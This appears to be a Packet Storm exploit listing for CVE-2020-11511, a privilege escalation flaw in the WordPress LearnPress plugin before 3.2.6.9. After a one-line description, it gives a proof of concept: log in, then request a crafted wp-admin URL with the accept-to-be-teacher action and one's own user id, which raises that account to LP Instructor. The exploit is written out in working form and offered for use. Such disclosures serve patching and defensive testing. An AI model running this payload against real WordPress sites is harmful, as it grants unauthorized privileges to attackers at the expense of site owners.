Headline
CVE-2020-11511: WordPress LearnPress Privilege Escalation ≈ Packet Storm
The LearnPress plugin before 3.2.6.9 for WordPress allows remote attackers to escalate the privileges of any user to LP Instructor via the accept-to-be-teacher action parameter.
# Exploit Title: WordPress Plugin LearnPress < 3.2.6.9 - User Registration Privilege Escalation# Date: 07-17-2021# Exploit Author: nhattruong or nhattruong.blog# Vendor Homepage: https://thimpress.com/learnpress/# Software Link: https://wordpress.org/plugins/learnpress/# Version: < 3.2.6.9# References link: https://wpscan.com/vulnerability/22b2cbaa-9173-458a-bc12-85e7c96961cd# CVE: CVE-2020-11511POC:1. Find out your user id2. Login with your cred3. Execute the payloadhttp://<host>/wp-admin/?action=accept-to-be-teacher&user_id=<your_id># Done!